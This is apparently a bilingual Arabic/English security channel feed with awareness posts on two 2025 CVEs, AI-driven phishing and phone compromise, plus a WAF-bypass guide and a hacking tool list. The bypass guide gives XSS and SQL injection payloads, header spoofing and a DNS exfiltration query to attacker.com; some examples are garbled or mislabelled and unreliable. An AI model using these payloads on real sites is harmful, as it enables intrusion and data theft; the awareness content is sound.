متيجو نتكلم عن zero day فل ايفون 💀


اي يعم سبايدر انت بتقول اي 😂

طب اشتري مني لاخر 😁

*تحذير محتوي قناه له حقوق طبع و نشر ⭐


موضوعنا النهارده عن

CVE-2025-24201

الثغره دي تعتبر زيرو داي لنها يوم 14 مارس 💀

المهم الثغره دي اكتشفوها في متصفح WebKit

استناااا مش WebKit دا الي ف سفاري ( Safari )

ايو يعزيزي كلمك صح انت معك ايفون ولا اي ؟

المهم نوع الثغره ( Out-of-Bounds Write )

اي الثغره دي ؟

انا هقولك الثغره دي بتحصل لما كتابه البيانات في الذاكره المفروض بيكون في حدود امنيه تمنع التعديل علي موقع غير مخصصه ليها الحقيقة مش موجوده و الثغره دي بتيح ان يحصل rce علي التلفون

الحمدالله اني منزل تحديث ios 18

مش عايز اصدمك يعزيري بس هيا بتشتغل علي

iOS 18.3.2 وما قبله

iPadOS 18.3.2 وما قبله

macOS Sequoia 15.3.2 وما قبله

Safari 18.3.1 وما قبله

visionOS 2.3.2 وما قبله

طيب الحل اي ؟

نزل تحديث ios جديد ✅

نزل برامج حمايه antivirus ✅

خلي بالك من محتوي المشبوه ✅


مصدر الثغره :

https://nvd.nist.gov/vuln/detail/CVE-2025-24201

Let’s Talk About a Zero-Day in iPhone 💀

What’s up, Spider? What are you talking about? 😂

Alright, let me break it down for you. 😁

🚨 Content Warning: This channel holds copyright rights. ⭐


---

Today's Topic: CVE-2025-24201

This vulnerability is classified as a zero-day because it was discovered on March 14 💀.

The flaw was found in the WebKit browser engine.

Wait a minute... isn’t WebKit the engine used in Safari?

Yes, my friend, you got that right! Do you own an iPhone or what?


---

What’s the Type of This Vulnerability?

📌 Out-of-Bounds Write

What does that mean? 🤔

Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.


---

Which Devices Are Affected?

The vulnerability affects the following systems:

iOS 18.3.2 and earlier

iPadOS 18.3.2 and earlier

macOS Sequoia 15.3.2 and earlier

Safari 18.3.1 and earlier

visionOS 2.3.2 and earlier



---

How to Protect Yourself?

✅ Update to the latest iOS version.
✅ Install antivirus and security software.
✅ Be cautious of suspicious content and links.


---

Source of the CVE:

https://nvd.nist.gov/vuln/detail/CVE-2025-24201

قال رسول الله عليه الصلاة والسلام (اذا مات ابن ادم انقطع عمله الا من ثلاث صدقة جارية او علم ينتفع به او ولد صالح يدعو له)

بوست النهارده ميكس بين الذكاء الاصطناعي و السايبر سكيورتي 💀


تحذيرين

لاول : القناه غير مسؤوله عن الذي سوف يتم ما يتم فعلها من الشخص دا مقال علمي و مفيد


التاني : القناه ليها حقوق طبع و نشر عايزها تدخل تكلمني خاص


نرجع ل موضوعنا 😁

الوقتي بقي بيحصل اعمال بين الذكاء الاصطناعي و السايبر سكيورتي و منهم اعمال فيشينج

وه فيشينج يسبايدر 😱


بص يعزيزي عشان عارف انت دلوقتي بتقول اي الفيشينج دا اختصار ان الفيشينج دا بيكون صفحه مزوره بتكتب بيها بياناتك و بتروح ل صاحب الصفحه و بتكون شبه الموقع الحقيقي بظبط

المهم الوقتي بقي في ناس في اوروبا تحديدا بيستخدمو ai ( مش متعلمين برمجه ) عشان يكتب كود صفحه مزوره شبه Facebook و انت تدخل عليها و فجاه تلقي حسابك راح دا غير انو بيكون عندو عنوانك ( ip ) و عن طريق ip يقدر يجيبو و بعدها طورو الموضوع بقو بيستخدمو الذكاء الاصطناعي علي اساس انهم حد من بنك او نجم مشهور و يكلموك من فيك اكونت او فيك نمبر ولو كلمك من فيك اكونت يعمل فيديو علي اساس انو نجم دا او الشخص دا و فيك نمبر بيغير الصوت الموضوع دا قالب أوروبا كلها ف خلي بالكم ❤️


الحل اي طيب يا سبايدر 🙂


بص اول حاجه

مش ترد علي رقم غريب يعني لو لقيت رقم و بيقولك انا محمد رمضان و بيقولك عنوانك و رقم الفيزه قولو انت حمضان

مش تقبل اي اكونت فيك غير لما تتاكد انو شخص حقيقي

مش ترد علي اي رساله مجهوله فل sms او الواتس او او

مش تدخل علي لينكات مشبوهة يعني مثلا

www.fecebook.com

انصحك تشير البوست فل خير مش شرط كتابه محتوي نفسو مجاني ولكن كتابه ليها الحقوق طبع و النشر اتمنه تخلي بالكم ❤️

مصدر :

⚠️ Two Warnings Before We Start:
1️⃣ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2️⃣ All rights reserved. If you want to share the content, contact me first.

🤖 AI & Cybersecurity - Phishing Spider 🕷️

Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.

What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.

What’s new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!

Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:

Deepfake videos to mimic famous people.

Voice cloning to sound like someone you trust.

Fake numbers to contact victims and gain their trust.


This technique is spreading rapidly in Europe, so be careful!

🛡️ How to Protect Yourself?

✅ Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
✅ Do not accept friend requests from suspicious accounts without verifying their identity.
✅ Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
✅ Do not click on suspicious links, for example:
❌ www.fecebook.com instead of www.facebook.com

Share this post to raise awareness! Cybersecurity starts with knowledge. ❤️

زي مشرحنا ios جه دور لاندرويد


*تحذيرين*


الاول : القناه غير مسؤوله عن فعل مستخدم

التاني : القناه ليها حقوق طبع و نشر


نرجع ل موضوعنا 😁


النهارده هنتكلم عن cve فريد من نوعو

لسه نازل من قريب يعتبر و ركز يعتبر

زيرو داي cve النهارده اسمو

CVE-2025-0074


التاريخ : 2024 ديسمبر يوم 13 و 2025 مارس يوم 3 💀


بيعمل اي الcve دا يا سبايدر 🙂

بص يعزيزي الcve بيشتغل عن طريق

بلوتوث بدون ركز معايا ف دي لا اذن من

مستخدم ولا اضافات ولا امتيازت

ينهار ابيض يا سبايدر يعني انا ممكن

اشوف حد عمل cve دا علي جهازي و انا مش عارف 😱

هقولك ايو و كمان هيعمل rce 😁

الله يطمنك طمنتني 🙂

نرجع لموضوعنا ال cve بيشتغل عن

طريق هجمه UAF ( Use-After-Free )

و المره دي بتيح ان الشخص يكتب كود

برمجيات خبيثه ( malware ) علي جهاز

الضحيه بدون علم منو و الثغره تم

تنصيفها انه حرجه ( Critical )

طب الحمدالله انا جهازي اندرويد 14


ياااا يعزيزي يوسفني اقولك انو بيبداء من اول

اندوريد 14 و اندرويد 13 و اندرويد 12


و اندوريد 11 بس الخبر الحلو مش


بتشتغل علي اندوريد قبل 11 يعني


اندرويد 9 عادي و اقل منو


طيب الحل اي ؟

الحل :

تحدث اخر اصدار عندك ✅

تنزل antivirus ✅

مش تبقي فاتح بلوتوث كتير ✅


شكرا علي دعمكم لولا دعمكم ليا مش

طورت المحتوي و دايما بحاول اطورو

بسبب دعمكم و شكرا 🤍


مصدر :


https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304

As We Explained iOS, Now It's Android's Turn!

⚠️ Two Warnings:

1. The channel is not responsible for any misuse of this information.


2. All content is copyrighted. Contact us for permissions.




---

📌 Today’s Topic: A Unique CVE!

A recently discovered zero-day vulnerability:

CVE-2025-0074

📅 Date of Discovery: December 13, 2024
📅 Security Patch Released: March 3, 2025 💀


---

🔥 What Does This CVE Do?

This vulnerability exploits Bluetooth in a completely silent way—
🚫 No user permission required
🚫 No additional software needed
🚫 No special privileges required

🤯 So, someone can exploit this CVE on my device without me knowing?

✔ Yes! And it allows Remote Code Execution (RCE). 😁


---

🛠️ How It Works

The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victim’s device without their knowledge.

🚨 Severity Level: Critical


---

📱 Affected Devices

Bad news: 😢

Affects Android 11, 12, 13, and 14.


Good news: 😃

Does NOT affect Android 9 and lower.



---

✅ How to Protect Yourself?

1️⃣ Update to the latest security patch ✅
2️⃣ Use a trusted antivirus ✅
3️⃣ Keep Bluetooth disabled when not in use ✅


---

💡 Thanks for your support! Your engagement helps me improve the content every day. Stay safe! 🤍


Source :

https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304

تعالو نتكلم عن موضوع مهم جدا و الي

هو ازاي نعمل bypass لي

waf ( web application firewall )

تحذير :

1 : القناه غير مسؤوله عن اي فعل خارج لاطار التعليمي

2 : ممنوع نشر المقال دون ذكر اسم القال يكمن نشر المعلومه ولكن لا يمكن نشر الكتابه بحد ذاتها الي ب اذن من صاحب قناه


نفترض عندنا سيناريو ل واحد نسمي

حماصه حماصه كان قعد يهنت ولقي ثغره

sql injection

شرح سريع : sql injection دي بتحقن

بايلود في اكواد sql بتاع موقع عشان

تسحب داتا خاصه

المهم حماصه لما جه يستغل ثغره معرفش

معرفش يعملها exploit بسبب waf

طيب حماصه يعمل اي ؟

انا هقولك ✨

اول حاجه : حماصه يجرب يلعب في

بايلود يعمل encode بختصار

طب زي اي يا سبايدر 🤔

زي بايلود xss

<script>alert(1)</script>

نفسو بعد ما تعمل encode url

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E

بايلود وقتها بيشتغل عادي كنو نفس لاول

طيب نفرض مش اشتغل 🤔

تاني خطوه :

تلاعب في headers

اي التلاعب في الهيدر دي ؟

شوف تلاعب في الهيدر بتكون انك تحاول

تغير حمايه زي X-Original-URL

طيب ازاي 🤔

بسيطه

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

طيب نفرض انها مش اشتغلت نعمل اي ؟

نيجي لي خطوه تالته :

نجرب نعدل ف HTTP ممكن نخلي

TRACE
و يشتغل معانا

مثال

HEAD /admin HTTP/1.1
او
TRACE /admin HTTP/1.1

بدل get او post

طيب نفترض مش اشتغلت 🤔

نيجي لي طريقه الرابعه :

الخطوه دي شبه الي فاتت ولكن انت

هتجرب تعدل الملف يكون مثلا xml

مثال :
/admin.json

طيب نفترض مش اشتغلت 😂🤔

هقولك بردو في خطوه خامسه 😂

الخطوه الخامسه :

و دي بسيطه في waf بيكون مش عارف

يفرق بين الحروف الصغيره من حروف
الكبير

بتهزر يا سبايدر يعني waf طلع غبي كد

هقولك ايو مثال

<script>alert(1)</script>

دا كود xss عادي

<Script>alert(1)</Script>

هو نفس الكود بنفس الطريقه

طيب نفترض مش اشتغلت 🤔

هقولك في طريقه سادسه :


الطريقه دي ممكن تتلاعب ف dns خاص

بل موقع

مثال :

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));

دا بايلود عادي

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

بعد تعديل

طيب لو نجحت ؟

اخر طريقه و هيا السابعه :

شوف اصدار waf و دور علي cve لي

و جرب cve كلهم لحد ما تقدر تعمل bypass

شكرا ل قرائه المقال حاولت اكون خفيف و ملم بكل شئ 🤍

Bypassing WAF (Web Application Firewall): A Practical Guide

Disclaimer:

1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.


2. You may share the knowledge but do not copy this article without permission from the author.




---

Introduction

Let's imagine a scenario where a hacker, whom we’ll call Hamasah, discovers a SQL Injection vulnerability on a target website.

Quick Explanation:

SQL Injection allows attackers to inject malicious SQL queries into an application’s database to extract sensitive information.

However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).

So, what should Hamasah do? 🤔

Let's explore different WAF bypass techniques step by step.


---

1. Encoding the Payload

One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAF’s predefined signatures.

Example: XSS Encoding

Original Payload:

<script>alert(1)</script>

Encoded Payload (URL Encoding):

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E


In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.


---

2. Header Manipulation

Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.

Example: Spoofing X-Forwarded-For

Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.


---

3. HTTP Method Manipulation

Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.

Example:

HEAD /admin HTTP/1.1

or

TRACE /admin HTTP/1.1

Some WAFs do not inspect these methods as strictly as GET/POST.


---

4. Switching to Alternative Data Formats

If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.

Example:

Instead of:

username=admin' OR 1=1 --

Try sending it as JSON:

{ "username": "admin' OR 1=1 --", "password": "password" }

Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.


---

5. Case Manipulation

Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.

Example: XSS Attack Case Manipulation

Normal Payload:

<script>alert(1)</script>

Bypass Attempt:

<Script>alert(1)</Script>


If the WAF only blocks lowercase "script", the uppercase version might go through.


---

6. Exploiting DNS-based Exfiltration

Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.

Example:

Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));

or

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.


---

7. Finding WAF Vulnerabilities (CVE Exploits)

The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.

Steps:

1. Identify the WAF using tools like WAFW00F:

wafw00f http://target.com


2. Search for CVEs related to that WAF.


3. Exploit known vulnerabilities to bypass or disable the WAF.



For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.


---

Conclusion

WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.

If one method doesn't work, try another approach—because there’s always a way!

Would you like me to help you turn this into a video script or add more advanced techniques?

ازاي اعرف اني مخترق


غالبًا الهاتف بيعلق لأن بعض التطبيقات بتستهلك كمية كبيرة من الإنترنت. لحل المشكلة دي، يُستحسن تحميل تطبيق زي GlassWire علشان تراقب استهلاك البيانات. لو لاحظت إن في تطبيق بيستهلك بيانات بشكل غير طبيعي من غير سبب واضح، ده ممكن يكون بسبب برنامج ضار بيرتبط بالإنترنت.

لو لقيت تطبيق غريب، ادخل على إعدادات الهاتف علشان تدور عليه. ليه؟ لأن بعض البرامج الضارة بتكون مخفية، زي ما ممكن تلاقي تطبيق مالوش اسم أو صورة. في الحالة دي، لازم تمسحه

بعض التطبيقات مش دايمًا مصممة علشان تسرق ملفاتك، لكنها ممكن تعرض إعلانات بشكل مفرط، حتى وانت مش فاتح التطبيق. الهدف من الإعلانات دي غالبًا بيكون الربح المادي. لو بدأت تلاقي إعلانات عشوائية في واجهة الهاتف من غير سبب، دي علامة واضحة إن في برنامج ضار على جهازك.
https://t.me/SpiderCodeCommunity1

كتابه : @Gg22rf ❤️

اللّهم كُن لأهل غزة عونًا ونصيرًا، وبدّل خوفهم أمنًا.
اللّهم اجعل لأهل غزة النصرة والعزة والغلبة والقوة والهيبة.
تعز علينا غزة ..يعز علينا عزاؤها.. اللّهم غزة حتى تطمئن.
اللّهم إنّ غزة في حِماك لا حِمى لها سِواك.
اللّهم نسألك نفحة من نفحات رحمتِك تلك التي لا تُبقي بؤسًا ، ولا حزنًا ، ولا ضيقًا ، ولا يأسًا أتت عليه إلا جعلته فرجًا وفرحًا يا الله ... ‏يارب بك تطيبُ الخواطر ومن عندك تتحقّق الأمنيات استودعناك شيئاً في خواطرنا ؛ فحققه لنا يا رب العالمين‏.

بكره اول يوم من ليله القدر ليله القدر ممكن تكون من اخر عشر تيام 🙌🏻

ب مناسبه وصولنا ل 140 هنزل ليكم افضل ادوات ريكون


Spider Tools

-----------------------

spider recon

----------------------



1 -  Amass


2 - Subfinder


3 - Assetfinder


4 - Shodan.io.com


5 -Censys.com


6 - Waybackurls


7 - Hakrawler


8 - Nmap ( خليها تفحص كل الروابط ف ملف )


9 - naabu


10 - httpx ( علشان تشوف الروابط الشغاله  )


11 - WhatWeb


12 - Wappalyzer ( اضافه في فاير فوكس )


13 - Dirsearch


14 - Arjun


15 - fuff ( لزمك اسكربت ليها )


16 - wfuzz ( زي fuff  )


17 - Burp Suite pro
☝🏻☝🏻☝🏻☝🏻☝🏻
( ضيف extension الموجوده ف متجر البرب اختار ال خمس نجوم منهم و ضيف burp bounty free و حط اسكربتات burp bounty pro )


18 - zap proxy


19 - Wireshark


20 - feroxbuster


21 - Knockpy


22 - Gobuster ( زي fuff )


23 -builtwith.com


24 - nuclei


25 - xsrfprobe


26 - webpwn3r ( بتاعت ابراهيم حجازي )


27 - RED_HAWK

28 - gbounty

(  Spider Osint  )



29 - maltego


30 - Spiderfoot



| Spider exploit |



31 - SQLmap


32 - metasploit


33 - XSStrike

34 - wpscan

35 -https://github.com/vavkamil/awesome-bugbounty-tools
☝🏻☝🏻☝🏻☝🏻☝🏻
( دول ادوات زياده عشان لو في ثغره لقيتها و لادوات مش نافعه معك  )

On the occasion of reaching 140, I’m sharing with you the best reconnaissance tools!

Spider Tools


---

Spider Recon


---

1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io
5 - Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap (Make it scan all URLs in a file)
9 - Naabu
10 - Httpx (To check for live URLs)
11 - WhatWeb
12 - Wappalyzer (Firefox extension)
13 - Dirsearch
14 - Arjun
15 - Ffuf (You’ll need a script for it)
16 - Wfuzz (Similar to Ffuf)
17 - Burp Suite Pro
☝🏻☝🏻☝🏻☝🏻☝🏻
(Add the extensions from the Burp store, choose the five-star ones, add Burp Bounty Free, and import Burp Bounty Pro scripts.)
18 - ZAP Proxy
19 - Wireshark
20 - Feroxbuster
21 - Knockpy
22 - Gobuster (Similar to Ffuf)
23 - BuiltWith.com
24 - Nuclei
25 - XSRFProbe
26 - WebPwn3r (By Ibrahim Hegazy)
27 - RED_HAWK
28 - GBounty

Spider OSINT

29 - Maltego
30 - SpiderFoot

Spider Exploit

31 - SQLmap
32 - Metasploit
33 - XSStrike
34 - WPScan
35 - Awesome Bug Bounty Tools
☝🏻☝🏻☝🏻☝🏻☝🏻
(Additional tools in case you find a vulnerability and need extra resources.)